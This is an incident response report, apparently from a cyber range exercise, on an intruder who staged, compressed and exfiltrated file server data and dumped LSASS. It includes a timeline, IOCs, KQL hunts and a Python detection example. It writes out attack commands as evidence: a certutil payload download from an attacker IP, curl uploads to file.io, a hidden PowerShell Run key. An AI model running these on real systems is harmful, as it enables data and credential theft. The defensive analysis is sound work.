Incident Response Report
Azuki Import/Export
Follow-On Intrusion — AZUKI-FILESERVER01
AZUKI-2025-Q4-02  ·  Post-Compromise Activity  ·  2025-11-22
ESCALATED TO: Josh — Cyber Range Community
Incident ID: AZUKI-2025-Q4-02
Predecessor: AZUKI-2025-Q4-01
Date of Report: February 18, 2026
Severity: CRITICAL
Report Status: Investigation Complete (Post-Incident Review)
Escalated To: Incident Response Lead
Analyst: Yousef Nabil
01 EXECUTIVE SUMMARY

This report documents a follow-on intrusion in the Azuki Import/Export environment that occurred after an initial access event captured in AZUKI-2025-Q4-01. Evidence confirms the threat actor returned approximately 72 hours after initial access, rotated external infrastructure, and executed a focused data collection and credential access operation primarily on AZUKI-FILESERVER01. All timestamps are reported in UTC unless otherwise stated.

During the follow-on activity, the actor conducted share and system discovery, staged sensitive data to a hidden directory (C:\Windows\Logs\CBS), compressed multiple datasets for transfer, and exfiltrated archives and a credential theft artefact (lsass.dmp) to an external web service. Persistence was established via a registry Run key configured to execute a hidden PowerShell script at startup, and anti-forensic activity was observed through deletion of PowerShell command history.

Confirmed impact includes unauthorised access to internal file shares, creation of a credential export file within the staging directory, confirmed external upload of multiple archives, and attempted credential theft via LSASS memory dumping. Given the presence of persistence, credential access activity, and confirmed exfiltration, this incident is assessed as CRITICAL and requires immediate containment and credential remediation actions.

02 WHO
External IPs

| IP Address | Role | Location | ASN / Org | Notes |
|---|---|---|---|---|
| 159.26.106.98 | Return access source (RDP) | London, United Kingdom | AS208172 — Proton AG | VPN/hosting egress — operator OPSEC; rotated from 88.97.178.12 |
| 78.141.196.6 | Staging + C2 server (retained) | London, United Kingdom | AS20473 — Vultr Holdings LLC | Previously observed; :8080/:7331 payload, :8880 C2 tasking/beaconing |
| file.io | Exfiltration destination | External (public service) | | Public file transfer service abused for multipart/form-data uploads |

Attacker Infrastructure

| Indicator | Role | Notes |
|---|---|---|
| 78.141.196.6:7331/8080 | Payload/script delivery | certutil download of ex.ps1 |
| 78.141.196.6:8880 | C2 tasking/beaconing | curl.exe against /api/tasks and /api/beacon endpoints |
| https://file.io | Exfiltration endpoint | curl.exe multipart uploads of archives and lsass.dmp |

Accounts Used

| Account | Type | Usage Observed |
|---|---|---|
| kenji.sato | Compromised user | Return access to AZUKI-SL from 159.26.106.98 |
| fileadmin | Compromised admin | Interactive execution on AZUKI-FILESERVER01 (discovery, staging, exfiltration) |
03 WHAT
  • Threat actor returned using rotated external infrastructure and resumed interactive operations after a dwell period.
  • Threat actor enumerated SMB shares using net.exe / net1.exe and validated access to remote shares via UNC (T1135).
  • Threat actor performed host and network discovery (ipconfig.exe /all; ARP.EXE -a) under the fileadmin context.
  • Threat actor staged data under C:\Windows\Logs\CBS and applied Hidden/System attributes using attrib.exe +h +s (T1564.001).
  • Threat actor downloaded a PowerShell script via certutil.exe -urlcache -f from 78.141.196.6 (T1105).
  • Threat actor recursively copied content from internal shares into the staging directory using xcopy.exe /E /I /H /Y (T1119, T1074.001).
  • Threat actor created a credential export file in the staging directory: C:\Windows\Logs\CBS\it-admin\IT-Admin-Passwords.csv (T1552, T1555).
  • Threat actor compressed staged content into .zip and .tar.gz archives in preparation for transfer.
  • Threat actor executed a renamed credential dumping utility (pd.exe) to create an LSASS memory dump (lsass.dmp) (T1036.003, T1003).
  • Threat actor established persistence by adding a Run key value name designed to appear legitimate: FileShareSync (T1547.001).
  • Threat actor exfiltrated staged archives and lsass.dmp to an external web service using curl.exe multipart uploads (-F file=@...) (T1567).
  • Threat actor deleted PowerShell PSReadLine history (ConsoleHost_history.txt) to reduce forensic traceability (T1070.003).
04 WHEN

Timeline (UTC):

| Time (UTC) | Event |
|---|---|
| 2025-11-22 00:27:58 | Follow-on access observed; external return IP identified as 159.26.106.98. |
| 00:42:23 – 00:42:37 | Discovery commands executed on AZUKI-FILESERVER01 (ipconfig.exe /all; ARP.EXE -a). |
| 00:43:05 – 00:43:07 | Share enumeration executed (net.exe share; net1.exe share). |
| 00:43:23 | Remote share enumeration executed (net.exe view \\10.1.0.188). |
| 00:56:47 | Tool transfer: certutil.exe downloads ex.ps1 to C:\Windows\Logs\CBS\ex.ps1 from 78.141.196.6. |
| 01:07:53 | Credential file staged: IT-Admin-Passwords.csv created in C:\Windows\Logs\CBS\it-admin. |
| 01:19:24 | Bulk staging: xcopy.exe replicates C:\FileShares\IT-Admin to C:\Windows\Logs\CBS\it-admin. |
| 01:20:46 | Bulk staging: xcopy.exe replicates C:\FileShares\Shipping to C:\Windows\Logs\CBS\shipping. |
| 01:21:38 – 01:30:10 | Compression: archives created (contracts.zip, financial.zip, it-admin.zip, credentials.zip, financial.tar.gz, credentials.tar.gz). |
| 01:59:54 – 02:00:20 | Exfiltration: curl.exe uploads staged archives to https://file.io. |
| 02:10:50 | Persistence: Run key value FileShareSync added to HKLM\...\CurrentVersion\Run. |
| 02:24:47 | Credential access: pd.exe creates LSASS memory dump at C:\Windows\Logs\CBS\lsass.dmp. |
| 02:25:37 | Exfiltration: curl.exe uploads lsass.dmp to https://file.io. |
| 02:26:01 | Anti-forensics: ConsoleHost_history.txt deleted from PSReadLine directory. |
05 WHERE
Targets

| Host | Role |
|---|---|
| AZUKI-SL | Beachhead workstation — return operator access (kenji.sato from 159.26.106.98) |
| AZUKI-FILESERVER01 | Primary activity host — discovery, staging, exfiltration, credential dumping, persistence |
| 10.1.0.188 | Internal SMB target — enumerated via net view |
Malware / Tool Paths
  • C:\Windows\Logs\CBS\ (hidden staging directory)
  • C:\Windows\Logs\CBS\ex.ps1
  • C:\Windows\Logs\CBS\it-admin\IT-Admin-Passwords.csv
  • C:\Windows\Logs\CBS\contracts.zip
  • C:\Windows\Logs\CBS\financial.zip
  • C:\Windows\Logs\CBS\credentials.zip
  • C:\Windows\Logs\CBS\financial.tar.gz
  • C:\Windows\Logs\CBS\credentials.tar.gz
  • C:\Windows\Logs\CBS\pd.exe
  • C:\Windows\Logs\CBS\lsass.dmp
  • C:\Windows\System32\svchost.ps1
  • C:\Users\fileadmin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt (deleted)
Network Connections

| Source → Destination | Protocol / Port | Purpose |
|---|---|---|
| AZUKI-SL ⇄ 159.26.106.98 | RDP | Follow-on operator access |
| AZUKI-FILESERVER01 → 78.141.196.6 | HTTP (7331/8080) | Payload/script retrieval (certutil) |
| AZUKI-FILESERVER01 → 78.141.196.6 | HTTP (8880) | C2 tasking and beaconing (curl) |
| AZUKI-FILESERVER01 → file.io | HTTPS (443) | Exfiltration of staged archives and lsass.dmp (curl -F) |
| AZUKI-FILESERVER01 → 10.1.0.188 | SMB (445) | Remote share enumeration/access (net view) |
06 WHY
Root Cause
  • Compromised credentials enabling interactive access and execution as legitimate users/administrators.
  • Insufficient privileged access protections allowing administrative account reuse across systems.
  • Lack of preventive controls for high-risk LOLBins (certutil, xcopy, tar, reg, curl) allowed data staging and exfiltration using trusted binaries.
  • File share controls permitted bulk copy/compression operations without blocking or immediate alerting.
Attacker Goal

Observed tradecraft and outcomes confirm the threat actor's goal was large-scale data theft and credential harvesting to enable continued access and lateral movement.

07 HOW
Return Access + Discovery
  • After a short dwell period, the operator returned from a new external IP (159.26.106.98) and resumed hands-on-keyboard activity. On AZUKI-FILESERVER01, the actor executed network and share discovery (ipconfig, ARP, net share, net view) to validate accessible resources and identify high-value share content for collection.
Staging + Collection
  • The actor staged data under C:\Windows\Logs\CBS and applied Hidden/System attributes to reduce visibility. Using xcopy with recursive copy parameters (/E /I /H /Y), the actor replicated internal share contents into subdirectories (it-admin, shipping) and aggregated high-value datasets including email archives, customs/shipping documentation, contracts, financial data, and an administrative credential export file (IT-Admin-Passwords.csv).
Compression + Exfiltration
  • Staged data was compressed into multiple archives (.zip and .tar.gz) and transferred externally using curl.exe multipart uploads to https://file.io. This technique provides a low-friction, scriptable exfiltration path and minimises custom tooling requirements. The actor also maintained HTTP-based tasking/beaconing with the external server 78.141.196.6 over port 8880 during the staging and exfiltration window.
Credential Access + Persistence + Anti-Forensics
  • Credential theft intent was confirmed by execution of a renamed dumping utility (pd.exe) to generate an LSASS memory dump (lsass.dmp), which was subsequently uploaded externally. Persistence was established by creating a registry Run key value (FileShareSync) configured to execute a hidden PowerShell script (svchost.ps1) at startup. To reduce traceability, the actor deleted the PSReadLine history file ConsoleHost_history.txt, which normally records interactive PowerShell commands across sessions.
08 IMPACT
| Status | Finding |
|---|---|
| Confirmed | Confirmed unauthorised staging and exfiltration of multiple datasets from internal file shares (contracts, financial, shipping, and IT administration). |
| Confirmed | Credential exposure risk: IT-Admin-Passwords.csv created in staging; LSASS memory dump created and exfiltrated. |
| Confirmed | Persistence established on AZUKI-FILESERVER01 via HKLM Run key value FileShareSync launching a hidden PowerShell script. |
| Confirmed | Forensic visibility reduced by deletion of PowerShell history artefacts (ConsoleHost_history.txt). |
| Risk: CRITICAL | Confirmed data exfiltration combined with credential dumping activity and persistence on a core file server significantly increases the likelihood of continued unauthorised access, lateral movement, and secondary compromise across the environment. |
09 THREAT INTELLIGENCE

159.26.106.98 (Return Access Source) — Public enrichment identifies this address as associated with AS208172 (Proton AG) and located in London, United Kingdom. Use of VPN/hosting egress infrastructure is consistent with operator OPSEC and rotating access nodes between sessions.

78.141.196.6 (Staging + C2 Server) — This IP was previously observed as attacker-controlled infrastructure and is associated with AS20473 (Vultr Holdings; 78.141.196.6.vultrusercontent.com). During follow-on activity, it supported both payload hosting (ex.ps1 retrieval via certutil) and ongoing HTTP tasking/beaconing observed via curl.exe against /api/tasks and /api/beacon endpoints.

file.io (Exfiltration Destination) — A public file transfer service abused for rapid, scriptable exfiltration using multipart/form-data uploads. The actor uploaded multiple archives and an LSASS dump (lsass.dmp), consistent with data theft and credential harvesting objectives.

Tools and Tradecraft Observed (host-based)
  • certutil.exe -urlcache -f for payload transfer into a non-standard staging directory (T1105).
  • xcopy.exe /E /I /H /Y for recursive staging while preserving directories and hidden files (T1119, T1074.001).
  • tar.exe and PowerShell archive operations to package staged content for transfer (T1074.001).
  • curl.exe with -F file=@... for multipart uploads to a web service (T1567).
  • reg.exe add to create HKLM Run key persistence (T1547.001).
  • attrib.exe +h +s to hide staging directory artefacts (T1564.001).
  • pd.exe (renamed ProcDump-style utility) used to create LSASS dump (T1003, T1036.003).
  • PowerShell PSReadLine history deletion to reduce evidence of interactive activity (T1070.003).
Malware / Payload Observations (based on paths + behaviour)
  • ex.ps1 was retrieved from external infrastructure and written under C:\Windows\Logs\CBS; likely used to facilitate staging and/or automation of collection tasks.
  • svchost.ps1 was configured for autostart execution at startup using a hidden PowerShell invocation; this represents an established persistence mechanism.
  • pd.exe executed with Sysinternals-style parameters (/accepteula, -ma) consistent with a renamed ProcDump-like tool used for LSASS dumping.
10 RECOMMENDATIONS
Immediate
  • Isolate AZUKI-FILESERVER01 and AZUKI-SL to prevent additional staging, exfiltration, or lateral movement.
  • Reset credentials and revoke sessions for all potentially exposed accounts (at minimum: fileadmin, kenji.sato) and any accounts stored in IT-Admin-Passwords.csv.
  • Remove persistence: delete Run key value FileShareSync and quarantine C:\Windows\System32\svchost.ps1.
  • Preserve evidence: collect memory images and relevant logs (endpoint telemetry, Security logs, PowerShell logs where available) before system cleanup.
  • Block outbound connectivity to known attacker infrastructure and abuse destinations (78.141.196.6, file.io) via firewall/proxy controls.
  • Hunt across endpoints for indicators: ex.ps1, pd.exe, lsass.dmp, archives under C:\Windows\Logs\CBS, and similar hidden staging folders.
Short-Term (24–48 Hours)
  • Assume credential compromise; conduct password resets for impacted user and service accounts, and rotate any secrets accessible from the file server.
  • Scope expansion: identify other hosts contacted via SMB and validate whether additional shares were staged or exfiltrated.
  • Deploy detections for curl.exe multipart uploads, certutil -urlcache downloads, attrib +h +s on abnormal paths, and reg.exe Run key creation.
  • Review administrative share permissions and audit share access patterns for abnormal bulk copy activity.
  • Validate no additional persistence exists (scheduled tasks, services, WMI subscriptions, startup folders).
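The detections named above (curl multipart uploads, certutil -urlcache downloads, attrib +h +s on abnormal paths, reg.exe Run key creation), together with the staging, compression and upload chain described in section 07, worked as an added Python example that is not part of this report or of the Azuki environment's tooling. It assumes process telemetry with the DeviceProcessEvents-style columns used in the KQL section; the sample events, the C:\Users baseline for attrib, and the two-hour correlation window are constructed assumptions.

```python
"""Detection rules for the LOLBin tradecraft in this report, plus a per-host correlation of the
stage -> pack -> upload chain. Added example, not from the report; the telemetry is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

STAGING_DIR = "c:\\windows\\logs\\cbs"   # staging directory observed in the report
USER_PROFILE_ROOT = "c:\\users\\"        # assumed baseline: attrib +h +s under profiles is normal
FS, ADM = "azuki-fileserver01", "fileadmin"

def ev(ts, host, user, file, cmd):  # mirrors the DeviceProcessEvents columns used by the KQL hunts
    return {"ts": ts, "host": host, "user": user, "file": file, "cmd": cmd}

EVENTS = [  # constructed sample telemetry following the report's timeline (UTC)
    ev("2025-11-22T00:56:47", FS, ADM, "certutil.exe",
       "certutil.exe -urlcache -f http://78.141.196.6:8080/ex.ps1 C:\\Windows\\Logs\\CBS\\ex.ps1"),
    ev("2025-11-22T00:57:10", FS, ADM, "attrib.exe", "attrib.exe +h +s C:\\Windows\\Logs\\CBS"),
    ev("2025-11-22T01:19:24", FS, ADM, "xcopy.exe",
       "xcopy.exe C:\\FileShares\\IT-Admin C:\\Windows\\Logs\\CBS\\it-admin /E /I /H /Y"),
    ev("2025-11-22T01:21:38", FS, ADM, "tar.exe",
       "tar.exe -czf C:\\Windows\\Logs\\CBS\\financial.tar.gz C:\\Windows\\Logs\\CBS\\financial"),
    ev("2025-11-22T01:59:54", FS, ADM, "curl.exe",
       "curl.exe -F \"file=@C:\\Windows\\Logs\\CBS\\contracts.zip\" https://file.io"),
    ev("2025-11-22T02:10:50", FS, ADM, "reg.exe", "reg.exe add HKLM\\Software\\Microsoft\\Windows"
       "\\CurrentVersion\\Run /v FileShareSync /d \"powershell -w hidden -f C:\\Windows\\System32\\svchost.ps1\""),
    # benign noise on another host: Hidden/System attributes inside a user profile
    ev("2025-11-22T03:00:00", "azuki-ws07", "maya.k", "attrib.exe",
       "attrib.exe +h +s C:\\Users\\maya.k\\AppData\\Local\\cache"),
]
def _lc(e): return e["cmd"].lower()
def rule_certutil_download(e):               # T1105
    return e["file"].lower() == "certutil.exe" and "-urlcache" in _lc(e)
def rule_curl_multipart(e):                  # T1567; -F is case-sensitive (-f means --fail)
    return e["file"].lower() == "curl.exe" and (
        re.search(r"(^|\s)-F(\s|$)", e["cmd"]) is not None or "file=@" in _lc(e))
def rule_attrib_hidden_system(e):            # T1564.001: +h +s on a path outside user profiles
    c, m = _lc(e), re.search(r'[a-z]:\\[^\s"]+', _lc(e))
    return (e["file"].lower() == "attrib.exe" and "+h" in c and "+s" in c
            and m is not None and not m.group(0).startswith(USER_PROFILE_ROOT))
def rule_reg_run_key(e):                     # T1547.001
    return e["file"].lower() == "reg.exe" and " add " in _lc(e) and "currentversion\\run" in _lc(e)
RULES = {"certutil -urlcache download": rule_certutil_download,
         "curl multipart upload": rule_curl_multipart,
         "attrib +h +s outside user profiles": rule_attrib_hidden_system,
         "reg add CurrentVersion\\Run": rule_reg_run_key}

def detect(events):  # -> [(timestamp, host, rule name)] for every event matching a rule
    return [(e["ts"], e["host"], n) for e in events for n, f in RULES.items() if f(e)]

def _phase(e):  # map an event that touches the staging dir to stage/pack/upload, else None
    c, f = _lc(e), e["file"].lower()
    if STAGING_DIR not in c: return None
    if f == "xcopy.exe" and "/e" in c: return "stage"
    if f == "tar.exe" or "compress-archive" in c: return "pack"
    return "upload" if rule_curl_multipart(e) else None

def staging_chain(events, window=timedelta(hours=2)):
    """Per host, flag stage -> pack -> upload occurring in that order within the window."""
    phases, hits = defaultdict(list), []
    for e in sorted(events, key=lambda x: x["ts"]):
        p = _phase(e)
        if p: phases[e["host"]].append((datetime.fromisoformat(e["ts"]), p))
    for host, seq in phases.items():
        want, start = ["stage", "pack", "upload"], None
        for ts, p in seq:
            if want and p == want[0]:
                start, want = start or ts, want[1:]
                if not want and ts - start <= window:
                    hits.append((host, start.isoformat(), ts.isoformat()))
    return hits
```

The single-event rules give per-technique alerts; the chain correlation is the higher-signal finding, since xcopy into a hidden directory followed by archiving and a curl -F upload from that same directory has few benign explanations on a file server.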
Long-Term (1–4 Weeks)
  • Enforce MFA and conditional access for privileged identities; restrict privileged account use on workstations and file servers.
  • Implement egress filtering and proxy controls to prevent direct uploads to public file transfer services.
  • Harden and monitor file servers: enable enhanced auditing for bulk copy and archive creation in sensitive directories.
  • Reduce LOLBin abuse surface by applying application control policies and monitoring high-risk binaries and suspicious command-line usage.
  • Improve centralised logging and tamper resistance for PowerShell telemetry and endpoint artefacts.
11 LESSONS LEARNED
  • Dwell time and infrastructure rotation highlight the need for behavioural detection beyond static IP blocks.
  • File servers are prime collection points; monitoring for recursive copy + compression behaviours provides high signal for data staging.
  • Public web services provide low-friction exfiltration paths; egress controls and SSL inspection/visibility are necessary to detect abuse.
  • Credential dumping attempts should trigger immediate credential rotation and privileged access reviews.
  • Deletion of PSReadLine history reinforces the need for centralised PowerShell logging that cannot be erased from endpoints.
12 KQL QUERIES
Q01 — Initial logon scoping to AZUKI endpoints
KQL
DeviceLogonEvents
| where DeviceName contains "azuki"
Q02 — Validate RemoteInteractive/Network logons to AZUKI endpoints (return access)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName has "azuki"
| where ActionType == "LogonSuccess"
| where LogonType in ("RemoteInteractive", "Network")
| project TimeGenerated, DeviceName, AccountName, RemoteIP, LogonType
| order by TimeGenerated asc
Q03 — Validate logon success to azuki-sl with specific return IP
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where ActionType == "LogonSuccess"
| where RemoteIP == "159.26.106.98"
| project TimeGenerated, DeviceName, AccountName, LogonType, RemoteIP, ActionType, FailureReason
| order by TimeGenerated asc
Q04 — Process execution by compromised user kenji.sato on azuki-sl
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where AccountName == "kenji.sato"
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q05 — Process execution with HTTP URLs (tool transfer/C2)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName has "azuki-fileserver01"
| where ProcessCommandLine has "http"
| project TimeGenerated, AccountName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q06 — Process execution on fileserver01 (noise reduction — exclude SYSTEM)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| where AccountName != "system"
Q07 — Discovery commands on fileserver01 (arp, ipconfig, net, whoami)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("arp.exe", "ipconfig.exe", "net.exe", "net1.exe", "whoami.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q08 — Privilege enumeration (whoami /priv /all /groups)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("whoami /priv", "whoami /all", "whoami /groups")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q09 — Process execution by fileadmin account on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where AccountName == "fileadmin"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q10 — PowerShell-initiated processes on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where InitiatingProcessFileName == "powershell.exe"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q11 — Pivot — validate host owning IP 10.1.0.188 via network events
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where LocalIP == "10.1.0.188"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, LocalIP, LocalPort, RemoteIP, RemotePort, Protocol
| order by TimeGenerated asc
Q12 — Pivot — find network connections to 10.1.0.188 (SMB/lateral movement)
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where RemoteIP == "10.1.0.188"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, LocalIP, LocalPort, RemoteIP, RemotePort, Protocol
| order by TimeGenerated asc
Q13 — Pivot — identify logon activity associated with IP 10.1.0.188
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where RemoteIP == "10.1.0.188"
| project TimeGenerated, RemoteIP, DeviceName, AccountName, LogonType, ActionType
Q14 — Defense evasion — hide staging directory (attrib +h +s)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine contains "attrib.exe"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q15 — Defense evasion — staging directory creation on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("mkdir", "New-Item", "attrib")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q16 — Collection/Staging — file creation in CBS staging directory
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where FolderPath startswith "C:\\Windows\\Logs\\CBS"
| where ActionType in ("FileCreated","FileRenamed")
| project TimeGenerated, DeviceName, AccountName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q17 — Exfiltration — curl multipart upload (-F file=@)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where FileName =~ "curl.exe"
| where ProcessCommandLine has_any ("-F", "file=@")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q18 — Persistence — Run key modification (HKLM\...\Run)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where RegistryKey has @"CurrentVersion\Run"
| where ActionType == "RegistryValueSet"
| project TimeGenerated, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q19 — Anti-forensics — PowerShell history deletion (ConsoleHost_history.txt)
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where ActionType == "FileDeleted"
| where FolderPath has "PSReadLine"
| project TimeGenerated, DeviceName, AccountName, ActionType, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
CONFIDENTIAL Azuki — Follow-On Intrusion  ·  Yousef Nabil  ·  February 18, 2026